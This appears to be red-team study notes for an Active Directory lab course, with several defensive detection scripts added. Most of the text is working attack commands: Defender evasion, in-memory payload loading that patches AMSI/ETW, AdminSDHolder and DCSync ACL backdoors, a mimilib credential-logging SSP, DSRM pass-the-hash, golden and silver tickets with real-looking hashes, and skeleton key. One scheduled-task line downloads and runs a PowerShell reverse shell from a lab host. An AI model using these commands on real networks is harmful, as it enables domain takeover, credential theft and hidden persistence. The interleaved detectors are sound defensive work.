can be used to detect code and strings from a binary that Windows Defender may flag as malicious.
usage:
PS> DefenderCheck.exe [file]

>>> STRING MANIPULATION
the simple way is to edit the code using an IDE, e.g. Visual Studio. for example, some triggers are associated to the word "credentials", so the basic way to bypass this is replacing the trigger word with another word, e.g. "Credents" (remember to replace it in all the code). run DefenderCheck until there are no flags.

::: STRING MANIPULATION for SAFETYKATZ (Page 114)
1. get the latest version of mimikatz & Out-CompressedDll.ps1
2. run the Out-CompressedDll.ps1 PowerShell script on the mimikatz binary and save the output to a file.
PS> Out-CompressedDll [Path/to/mimikatz.exe] > outputfilename.txt

::: BETTERSAFETYKATZ (Page 117)

::: AV-BYPASS OBFUSCATION (ConfuserEX) (Page 119)

::: PAYLOAD DELIVERY
The tool "netloader" can be used to deliver the payload.
NETLOADER
::: LOAD BINARY FROM FILEPATH OR URL AND PATCH AMSI & ETW WHILE EXECUTING
PS> C:\Users\Public\Loader.exe -path http://192.168.100.X/SafetyKatz.exe
::: USE ASSEMBLYLOAD.EXE TO LOAD NETLOADER IN MEMORY FROM A URL, WHICH THEN LOADS A BINARY FROM FILEPATH OR URL
PS> C:\Users\Public\AssemblyLoad.exe http://192.168.100.X/Loader.exe -path http://192.168.100.X/SafetyKatz.exe
DOMAIN OU ENUMERATION

-OU-
::: GET OUs IN A DOMAIN
PS> Get-DomainOU
PS> Get-ADOrganizationalUnit -Filter * -Properties *
::: GET ATTRIBUTE OF AN OU
PS> (Get-DomainOU -Identity [OU]).attribute
SAMPLE: PS> (Get-DomainOU -Identity Servers).gplink
::: FILTER NAME ON RESULTS
PS> Get-DomainOU | select -ExpandProperty [name]
::: LIST ALL COMPUTERS IN A SPECIFIC OU
PS> (Get-DomainOU -Identity [OUName]).distinguishedname | %{Get-DomainComputer -SearchBase $_} | select name
note: % = ForEach-Object, runs the block on each result (object)

POWERSHELL PERSISTENCE ACL

DOMAIN PERSISTENCE ACL ADMINSDHOLDER

AdminSDHolder resides in the System container of a domain and is used to control the permissions - using an ACL - of certain built-in privileged groups (called Protected Groups).
>> GROUPS
Account Operators | Enterprise Admins | Domain Controllers | Backup Operators | Administrators | Print Operators | Schema Admins | Replicator | Read-Only Domain Controllers
Security Descriptor Propagator (SDPROP) runs every hour and compares the ACL of protected groups and members with the ACL of AdminSDHolder; any differences are overwritten on the object ACL.
::: ACCOUNTS THAT CAN BE ABUSED
- Account Operators: Cannot modify DA/EA/BA groups. Can modify nested groups within these groups.
- Backup Operators: Backup GPO, edit it to add the SID of a controlled account to a privileged group, and Restore.
- Server Operators: Run a command as SYSTEM (using the disabled Browser service)
- Print Operators: Copy ntds.dit backup, load device drivers.
>> With DA privileges (Full Control/Write permissions) on the AdminSDHolder object, it can be used as a backdoor/persistence mechanism by adding a user with Full Permissions (or other interesting permissions) to the AdminSDHolder object.
>> In 60 minutes (when SDPROP runs), the user will be added with Full Control to the ACL of groups like Domain Admins without actually being a member of it.

::: ADD FULL CONTROL PERMISSIONS FOR A USER TO THE AdminSDHolder USING POWERVIEW AS DA
PS> Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity student1 -Rights All -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose
Using ActiveDirectory module and the RACE toolkit (https://github.com/samratashok/RACE):
PS> Set-DCPermissions -Method AdminSDHolder -SAMAccountName student1 -RightGeneric All -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local' -Verbose
::: OTHER INTERESTING PERMISSIONS (ResetPassword, WriteMembers) FOR A USER TO THE AdminSDHolder
PS> Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity student1 -Rights ResetPassword -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose
PS> Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity student1 -Rights WriteMembers -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose
::: RUN SDProp MANUALLY USING Invoke-SDPropagator.ps1 FROM THE TOOLS DIRECTORY
PS> Invoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose
::: FOR PRE-SERVER 2008 MACHINES
PS> Invoke-SDPropagator -taskname FixUpInheritance -timeoutMinutes 1 -showProgress -Verbose
::: CHECK THE DOMAIN ADMINS PERMISSIONS - PowerView AS NORMAL USER
PS> Get-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "student1"}
::: USING ACTIVE DIRECTORY MODULE
PS> (Get-Acl -Path 'AD:\CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local').Access | ?{$_.IdentityReference -match 'student1'}
::: ABUSING FULL CONTROL USING PowerView
PS> Add-DomainGroupMember -Identity 'Domain Admins' -Members testda -Verbose
::: USING ACTIVE DIRECTORY MODULE
PS> Add-ADGroupMember -Identity 'Domain Admins' -Members testda
::: ABUSING RESET PASSWORD USING POWERVIEW
PS> Set-DomainUserPassword -Identity testda -AccountPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose
::: USING AD MODULE
PS> Set-ADAccountPassword -Identity testda -NewPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose
DOMAIN PERSISTENCE ACL RIGHTS ABUSE

With DA privileges, the ACL for the domain root can be modified to provide useful rights like FullControl or the ability to run "DCSync".
::: ADD FULL CONTROL RIGHTS
PS> Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity student1 -Rights All -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose
::: USING ACTIVEDIRECTORY MODULE AND RACE
PS> Set-ADACL -SamAccountName studentuser1 -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -Right GenericAll -Verbose
::: ADD RIGHTS FOR DCSync
PS> Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity student1 -Rights DCSync -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose
::: USING ACTIVEDIRECTORY MODULE AND RACE
PS> Set-ADACL -SamAccountName studentuser1 -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -GUIDRight DCSync -Verbose
::: EXECUTE DCSync
PS> Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
or
PS> C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"
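A defender's counterpart to the two ACL-persistence sections above (extra ACEs planted on AdminSDHolder, FullControl or DCSync rights granted on the domain root), added here as an example and not from the original notes or the RACE toolkit: each ACE is normalised to a text key and anything absent from a baseline captured on a known-good object is reported. The baseline and the "current" ACEs below are constructed for the example; on a live domain the ACEs come from the same (Get-Acl -Path 'AD:\...').Access call the notes use, and the GUID table holds well-known schema values.

```powershell
# Rights GUIDs relevant to the abuses in the notes (well-known Active Directory schema values).
$KnownGuids = @{
    '00000000-0000-0000-0000-000000000000' = 'all properties / rights'
    '00299570-246d-11d0-a768-00aa006e0529' = 'User-Force-Change-Password (ResetPassword)'
    'bf9679c0-0de6-11d0-a285-00aa003049e2' = 'member attribute (WriteMembers)'
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes (DCSync)'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All (DCSync)'
}

function Get-AceKey {
    # One ACE -> 'trustee|type|rights|objectType', the unit the baseline is compared on.
    param([Parameter(Mandatory)]$Ace)
    $parts = "$($Ace.IdentityReference)", "$($Ace.AccessControlType)", "$($Ace.ActiveDirectoryRights)", "$($Ace.ObjectType)".ToLower()
    $parts -join '|'
}

function Export-AclBaseline {
    # Run once against a known-good object and keep the output under change control.
    param([Parameter(Mandatory)]$Access)
    foreach ($ace in $Access) { Get-AceKey -Ace $ace }
}

function Compare-AdAclBaseline {
    # Returns every current ACE whose key is absent from the baseline, rated by what it permits.
    param(
        [Parameter(Mandatory)]$Access,              # (Get-Acl 'AD:\...').Access or constructed objects
        [Parameter(Mandatory)][string[]]$Baseline   # keys produced by Export-AclBaseline
    )
    $known = @{}
    foreach ($k in $Baseline) { $known[$k] = $true }

    foreach ($ace in $Access) {
        $key = Get-AceKey -Ace $ace
        if ($known.ContainsKey($key)) { continue }
        $rights = "$($ace.ActiveDirectoryRights)"
        $guid   = "$($ace.ObjectType)".ToLower()
        $target = $KnownGuids[$guid]
        if (-not $target) { $target = $guid }
        # Rights that hand over the object outright, or the specific abuses the notes describe, rate high.
        $severity = 'review'
        if ($rights -match 'GenericAll|WriteDacl|WriteOwner' -or $target -match 'DCSync|ResetPassword|WriteMembers') {
            $severity = 'high'
        }
        [pscustomobject]@{
            Trustee   = "$($ace.IdentityReference)"
            Type      = "$($ace.AccessControlType)"
            Rights    = $rights
            AppliesTo = $target
            Inherited = [bool]$ace.IsInherited
            Severity  = $severity
        }
    }
}

# Builds constructed ACEs carrying the property names of ActiveDirectoryAccessRule.
function New-SampleAce {
    param($Trustee, $Rights, $Guid = '00000000-0000-0000-0000-000000000000', $Type = 'Allow')
    [pscustomobject]@{ IdentityReference = $Trustee; AccessControlType = $Type
                       ActiveDirectoryRights = $Rights; ObjectType = $Guid; IsInherited = $false }
}

# Constructed known-good ACL of the domain root (abridged; a real one is much longer).
$GoodAcl = @(
    New-SampleAce 'NT AUTHORITY\SYSTEM'           'GenericAll'
    New-SampleAce 'DOLLARCORP\Domain Admins'      'GenericAll'
    New-SampleAce 'BUILTIN\Administrators'        'GenericAll'
    New-SampleAce 'DOLLARCORP\Domain Controllers' 'ExtendedRight' '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2'
)
$Baseline = Export-AclBaseline -Access $GoodAcl

# Constructed "current" ACL: the baseline plus the ACEs the notes above plant for student1.
$CurrentAcl = $GoodAcl + @(
    New-SampleAce 'DOLLARCORP\student1' 'GenericAll'
    New-SampleAce 'DOLLARCORP\student1' 'ExtendedRight' '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2'
    New-SampleAce 'DOLLARCORP\student1' 'ExtendedRight' '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'
    New-SampleAce 'DOLLARCORP\student1' 'ExtendedRight' '00299570-246d-11d0-a768-00aa006e0529'
)

# Four rows, all rated high: GenericAll, both DCSync replication rights and ResetPassword for student1.
Compare-AdAclBaseline -Access $CurrentAcl -Baseline $Baseline | Format-Table -AutoSize
```

The same diff run against AdminSDHolder catches the backdoor before SDPROP copies it onto the protected groups, which is the hour the notes describe.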
DOMAIN PERSISTENCE ACL SECURITY DESCRIPTORS

>> Security Descriptor Definition Language (SDDL) defines the format which is used to describe a security descriptor. SDDL uses ACE strings for DACL and SACL:
ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid
>> ACE for built-in administrators for WMI namespaces
A;CI;CCDCLCSWRPWPRCWD;;;SID

::: USING WMI
Using the RACE toolkit. IMPORT THE MODULE
PS> . C:\AD\Tools\RACE-master\RACE.ps1
ON LOCAL MACHINE FOR student1
PS> Set-RemoteWMI -SamAccountName student1 -Verbose
ON REMOTE MACHINE FOR student1 WITHOUT EXPLICIT CREDENTIALS
PS> Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -namespace 'root\cimv2' -Verbose
ON REMOTE MACHINE WITH EXPLICIT CREDENTIALS. ONLY root\cimv2 AND NESTED NAMESPACES
PS> Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -Credential Administrator -namespace 'root\cimv2' -Verbose
ON REMOTE MACHINE, REMOVE PERMISSIONS
PS> Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -namespace 'root\cimv2' -Remove -Verbose

::: USING POWERSHELL REMOTING
ON LOCAL MACHINE FOR student1
PS> Set-RemotePSRemoting -SamAccountName student1 -Verbose
ON REMOTE MACHINE FOR student1 WITHOUT CREDENTIALS
PS> Set-RemotePSRemoting -SamAccountName student1 -ComputerName dcorp-dc -Verbose
ON REMOTE MACHINE, REMOVE THE PERMISSIONS
PS> Set-RemotePSRemoting -SamAccountName student1 -ComputerName dcorp-dc -Remove

::: USING REMOTE REGISTRY
USING RACE or DAMP, WITH ADMIN PRIVS ON THE REMOTE MACHINE
PS> Add-RemoteRegBackdoor -ComputerName dcorp-dc -Trustee student1 -Verbose
AS student1, RETRIEVE THE MACHINE ACCOUNT HASH
PS> Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose
RETRIEVE LOCAL ACCOUNT HASH
PS> Get-RemoteLocalAccountHash -ComputerName dcorp-dc -Verbose
RETRIEVE DOMAIN CACHED CREDENTIALS
PS> Get-RemoteCachedCredential -ComputerName dcorp-dc -Verbose
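An added example, not part of the original notes: a parser for the SDDL ACE layout given above (ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid), applied to the sc.exe sdshow output from the local privesc section so a defender can spot the service-reconfiguration rights PowerUp's Get-ModifiableService hunts for. The descriptor string is constructed for the example (its Everyone ACE deliberately carries DC); the two-letter right and trustee abbreviations are the documented SDDL ones, and the right meanings are the service-object ones, so the table has to be swapped for other object types such as the WMI namespaces above.

```powershell
# Service-object meaning of SDDL access-right abbreviations (they differ per object type).
$ServiceRights = @{
    CC = 'QUERY_CONFIG'; DC = 'CHANGE_CONFIG'; LC = 'QUERY_STATUS'; SW = 'ENUMERATE_DEPENDENTS'
    RP = 'START'; WP = 'STOP'; DT = 'PAUSE_CONTINUE'; LO = 'INTERROGATE'; CR = 'USER_DEFINED_CONTROL'
    SD = 'DELETE'; RC = 'READ_CONTROL'; WD = 'WRITE_DAC'; WO = 'WRITE_OWNER'
    GA = 'GENERIC_ALL'; GR = 'GENERIC_READ'; GW = 'GENERIC_WRITE'; GX = 'GENERIC_EXECUTE'
}
# SDDL well-known trustee abbreviations (the notes' "WD means Everyone" is this table).
$WellKnownSids = @{
    WD = 'Everyone'; AU = 'Authenticated Users'; BU = 'BUILTIN\Users'; IU = 'Interactive'
    NU = 'Network'; AN = 'Anonymous'; SU = 'Service'; SY = 'SYSTEM'; BA = 'BUILTIN\Administrators'
}
# Rights that let the holder change the binary path, delete or re-own the service, or rewrite its DACL.
$ReconfigureRights = 'DC', 'SD', 'WD', 'WO', 'GA', 'GW'
# Trustees an ordinary domain user falls into (assumption; extend with group SIDs as needed).
$LowPrivTrustees = 'WD', 'AU', 'BU', 'IU', 'NU', 'AN'

function ConvertFrom-ServiceSddl {
    # Splits the DACL of a service SDDL string into one object per ACE.
    param([Parameter(Mandatory)][string]$Sddl)
    $aces = @()
    # DACL = everything after 'D:' (plus optional flags) up to the SACL 'S:' or the end.
    if ($Sddl -notmatch 'D:[A-Z]*((?:\([^)]*\))+)') { return $aces }
    $dacl = $Matches[1]
    foreach ($m in [regex]::Matches($dacl, '\(([^)]*)\)')) {
        $f = $m.Groups[1].Value -split ';'
        if ($f.Count -lt 6) { continue }          # malformed ACE string
        $type = $f[0]
        if ($type -eq 'A') { $type = 'Allow' } elseif ($type -eq 'D') { $type = 'Deny' }
        $letters = @()
        if ($f[2] -notlike '0x*') {                # rights are two-letter codes unless given as a hex mask
            for ($i = 0; $i + 1 -lt $f[2].Length; $i += 2) { $letters += $f[2].Substring($i, 2) }
        }
        $trusteeName = $WellKnownSids[$f[5]]
        if (-not $trusteeName) { $trusteeName = $f[5] }   # raw S-1-... SID
        $aces += [pscustomobject]@{
            Type        = $type
            Flags       = $f[1]
            Rights      = $letters
            RightNames  = ($letters | ForEach-Object { if ($ServiceRights[$_]) { $ServiceRights[$_] } else { $_ } }) -join ','
            Trustee     = $f[5]
            TrusteeName = $trusteeName
        }
    }
    return $aces
}

function Test-ServiceSddl {
    # Reports Allow ACEs that give a low-privileged trustee a reconfiguration right.
    param([Parameter(Mandatory)][string]$Sddl, [string]$ServiceName = '(unknown)')
    foreach ($ace in ConvertFrom-ServiceSddl -Sddl $Sddl) {
        if ($ace.Type -ne 'Allow' -or $ace.Trustee -notin $LowPrivTrustees) { continue }
        $bad = @($ace.Rights | Where-Object { $_ -in $ReconfigureRights })
        if ($bad.Count -eq 0) { continue }
        [pscustomobject]@{
            Service    = $ServiceName
            Trustee    = $ace.TrusteeName
            RiskyRight = ($bad | ForEach-Object { "$_ ($($ServiceRights[$_]))" }) -join ', '
            AllRights  = $ace.RightNames
        }
    }
}

# Constructed descriptor in sc.exe sdshow layout. SYSTEM, Administrators, Interactive and Service
# carry the usual defaults; Everyone (WD) deliberately carries DC (CHANGE_CONFIG) to show a hit.
$SampleSddl = 'D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCDCLCSWRPWPDTLOCRRC;;;WD)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)'

ConvertFrom-ServiceSddl -Sddl $SampleSddl | Format-Table Type, TrusteeName, RightNames -AutoSize
# One row: Everyone with DC (CHANGE_CONFIG). The BA entry is not reported because BA is not low-privileged.
Test-ServiceSddl -Sddl $SampleSddl -ServiceName 'sample-svc' | Format-Table -AutoSize
# Against a real service: Test-ServiceSddl -Sddl ((sc.exe sdshow snmptrap) -join '') -ServiceName snmptrap
```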

POWERSHELL PERSISTENCE

DOMAIN PERSISTENCE CUSTOM SSP
DESCRIPTION: A Security Support Provider (SSP) "is a DLL which provides ways for an application to obtain an authenticated connection". Samples: NTLM | Kerberos | Wdigest | CredSSP
Mimikatz provides a custom SSP, mimilib.dll. This SSP logs local logons, service account and machine account passwords in clear text on the target server.
>> Two ways:
::: .DLL
Process: drop mimilib.dll into system32 and add "mimilib" to the 'Security Packages' value under HKLM\SYSTEM\CurrentControlSet\Control\Lsa
PS> $packages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' | select -ExpandProperty 'Security Packages'
PS> $packages += "mimilib"
PS> Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' -Value $packages
PS> Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name 'Security Packages' -Value $packages
::: INJECT INTO LSASS USING MIMIKATZ
PS> Invoke-Mimikatz -Command '"misc::memssp"'
NOTE: local logons are logged to the file C:\Windows\system32\kiwissp.log
DOMAIN PERSISTENCE DSRM
DESCRIPTION: "Directory Services Restore Mode"
- There is a local administrator on every DC called "Administrator" whose password is the DSRM password.
- After altering the configuration on the DC, it is possible to pass the NTLM hash of this user to access the DC.
::: DUMP DSRM PASSWORD (needs DA privs)
PS> Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername dcorp-dc
::: COMPARE THE "ADMINISTRATOR" HASH WITH THE ADMINISTRATOR HASH FROM THE COMMAND BELOW
PS> Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dcorp-dc
Since it is the local administrator of the DC, we can pass the hash to authenticate. But the logon behavior for the DSRM account needs to be changed before we can use its hash.
PS> Enter-PSSession -Computername dcorp-dc
PS> New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
::: PASS THE HASH
PS> Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:powershell.exe"'
PS> ls \\dcorp-dc\C$
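Both the custom SSP and the DSRM sections above leave traces under the same LSA registry key, so one audit script covers them. It is an added example (not from the CRTP material or Mimikatz): it lists every registered Security Package and checks that its DLL exists in System32 and is Microsoft-signed (mimilib.dll fails that), reads DsrmAdminLogonBehavior (2 is the value the backdoor sets), and reports whether RunAsPPL protects lsass against injection of the kind misc::memssp performs. It assumes it runs as an administrator on the DC itself (wrap it in Invoke-Command for remote use); the "Microsoft" subject check is a heuristic, not a full chain validation.

```powershell
$LsaKey      = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$OsConfigKey = "$LsaKey\OSConfig"

function Get-SecurityPackageStatus {
    # 'Security Packages' is a REG_MULTI_SZ in both keys; a stock system lists only Microsoft SSPs (or the literal "").
    $names = foreach ($key in $LsaKey, $OsConfigKey) {
        (Get-ItemProperty -Path $key -Name 'Security Packages' -ErrorAction SilentlyContinue).'Security Packages'
    }
    foreach ($name in ($names | Where-Object { $_ -and $_ -ne '""' } | Sort-Object -Unique)) {
        $dll = Join-Path $env:SystemRoot "System32\$name.dll"
        $sig = if (Test-Path $dll) { Get-AuthenticodeSignature -FilePath $dll } else { $null }
        [pscustomobject]@{
            Package   = $name
            Dll       = $dll
            Present   = [bool]$sig
            Signed    = ($null -ne $sig) -and ($sig.Status -eq 'Valid')
            Microsoft = ($null -ne $sig) -and ($sig.SignerCertificate.Subject -like '*Microsoft*')
        }
    }
}

function Get-DsrmLogonBehavior {
    # 0/absent = DSRM admin logs on only in restore mode, 1 = also while AD DS is stopped, 2 = always (set by the backdoor above)
    $v = (Get-ItemProperty -Path $LsaKey -Name 'DsrmAdminLogonBehavior' -ErrorAction SilentlyContinue).DsrmAdminLogonBehavior
    [pscustomobject]@{ DsrmAdminLogonBehavior = $(if ($null -eq $v) { 0 } else { $v }); Risky = ($v -eq 2) }
}

function Get-LsaProtection {
    # RunAsPPL = 1 runs lsass as a protected process, so unsigned code cannot be loaded into it (memssp, skeleton key)
    $v = (Get-ItemProperty -Path $LsaKey -Name 'RunAsPPL' -ErrorAction SilentlyContinue).RunAsPPL
    [pscustomobject]@{ RunAsPPL = $(if ($null -eq $v) { 0 } else { $v }); Enabled = ($v -eq 1) }
}

# Any package that is missing, unsigned or not Microsoft-signed deserves a look; mimilib.dll fails all three.
Get-SecurityPackageStatus | Where-Object { -not ($_.Present -and $_.Signed -and $_.Microsoft) }
Get-DsrmLogonBehavior
Get-LsaProtection
```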
DOMAIN PERSISTENCE GOLDEN
DESCRIPTION: A forged TGT, signed with the hash of the krbtgt account.
::: GET KRBTGT HASH
- Execute mimikatz on the DC as DA to get the krbtgt hash
PS> Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dcorp-dc
- On any machine
PS> Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
::: USING DCSYNC
To use the DCSync feature for getting the krbtgt hash, execute the command below with DA privileges (or as a user that has replication rights on the domain object)
PS> Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
DOMAIN PERSISTENCE SILVER
DESCRIPTION: A forged, valid TGS (the golden ticket is a TGT). It is encrypted and signed with the hash of the service account running the service (the golden ticket is signed with the krbtgt hash). Services rarely check the PAC (Privilege Attribute Certificate). A silver ticket gives access only to the service it was forged for. Reasonable persistence period (the default password change interval for computer accounts is 30 days).
::: USING THE HASH OF THE DOMAIN CONTROLLER COMPUTER ACCOUNT, THE COMMAND BELOW PROVIDES ACCESS TO SHARES ON THE DC
PS> Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:CIFS /rc4:6f5b5acaf7433b3282ac22e21e62ff22 /user:Administrator /ptt"'
NOTE: the same command can be used for other services (HTTP, HOST and more)
::: CREATE A SILVER TICKET FOR THE HOST SPN, WHICH ALLOWS SCHEDULING A TASK ON THE TARGET
PS> Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:6f5b5acaf7433b3282ac22e21e62ff22 /user:Administrator /ptt"'
::: SCHEDULE AND EXECUTE A TASK
PS> schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'iex(New-Object Net.WebClient).DownloadString(''http://192.168.100.1:8080/Invoke-PowerShellTcp.ps1''')'"
PS> schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "STCheck"
DOMAIN PERSISTENCE SKELETON KEY
DESCRIPTION: Skeleton key is a persistence technique where the Domain Controller's lsass process is patched so that it allows access as any user with a single password.
::: INJECT A SKELETON KEY (the password will be "mimikatz") ON A DOMAIN CONTROLLER OF CHOICE (DA privileges required)
PS> Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName dcorp-dc.dollarcorp.moneycorp.local
Now it is possible to access any machine with a valid username and the password "mimikatz":
PS> Enter-PSSession -Computername dcorp-dc -credential dcorp\Administrator
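One hunt that covers the golden ticket, silver ticket and skeleton key sections above: all three depend on RC4-HMAC. The forged tickets are built from NTLM hashes (/krbtgt:, /rc4:) and the Mimikatz skeleton key only works when RC4 is negotiated, so in a domain whose accounts use AES, TGT requests (4768) and service-ticket requests (4769) with Ticket Encryption Type 0x17 for privileged accounts or DC service accounts are a strong lead (Kerberoasting produces the same pattern, which is a second reason to look). This is an added example, not CRTP material or a Microsoft-provided rule; the two sample events are constructed, with TEST-NET addresses. A silver ticket never touches the KDC, so for it the matching signal is a 4624 on the target host with no corresponding 4769 on any DC.

```powershell
function Get-Rc4KerberosTicketEvent {
    param([Parameter(Mandatory, ValueFromPipeline)][string]$EventXml)
    process {
        $e = ([xml]$EventXml).Event
        $d = @{}
        foreach ($item in $e.EventData.Data) { $d[$item.Name] = $item.'#text' }
        # 0x17 = RC4-HMAC; AES tickets are 0x11/0x12. Tickets forged from an NTLM hash are always RC4.
        if ($d['TicketEncryptionType'] -ne '0x17') { return }
        $id = $e.System.EventID
        if ($id -is [System.Xml.XmlElement]) { $id = $id.'#text' }   # real events may carry a Qualifiers attribute
        [pscustomobject]@{
            Time    = $e.System.TimeCreated.SystemTime
            EventId = [int]$id
            Account = $d['TargetUserName']
            Service = $d['ServiceName']          # 'krbtgt' for 4768, the SPN's account for 4769
            Client  = $d['IpAddress'] -replace '^::ffff:', ''
        }
    }
}

# Constructed sample events: an RC4 service-ticket request for the DC's own account (flagged) and an AES TGT request (not flagged).
$SampleEvents = @(
    '<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><EventID>4769</EventID><TimeCreated SystemTime="2024-01-01T10:00:00Z"/></System><EventData><Data Name="TargetUserName">Administrator@DOLLARCORP.MONEYCORP.LOCAL</Data><Data Name="ServiceName">DCORP-DC$</Data><Data Name="TicketEncryptionType">0x17</Data><Data Name="IpAddress">::ffff:192.0.2.10</Data></EventData></Event>',
    '<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><EventID>4768</EventID><TimeCreated SystemTime="2024-01-01T10:05:00Z"/></System><EventData><Data Name="TargetUserName">student1</Data><Data Name="ServiceName">krbtgt</Data><Data Name="TicketEncryptionType">0x12</Data><Data Name="IpAddress">::ffff:192.0.2.11</Data></EventData></Event>'
)
$SampleEvents | Get-Rc4KerberosTicketEvent

# On a DC, against the live Security log:
# Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4768,4769} -MaxEvents 10000 | ForEach-Object { $_.ToXml() } | Get-Rc4KerberosTicketEvent
```

Rotating the krbtgt password twice (and the DC computer account password) after a suspected compromise invalidates forged tickets built from the old hashes.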

POWERSHELL CONNECTION

REMOTE CONNECTION
::: CONNECT TO A REMOTE MACHINE USING WINRS
PS> winrs -r:[hostname] [command]
PS> winrs -r:CVS-SRV001 cmd
::: CONNECT TO A REMOTE MACHINE USING POWERSHELL REMOTING
PS> Enter-PSSession -ComputerName [FQDN]

©® - Since 2023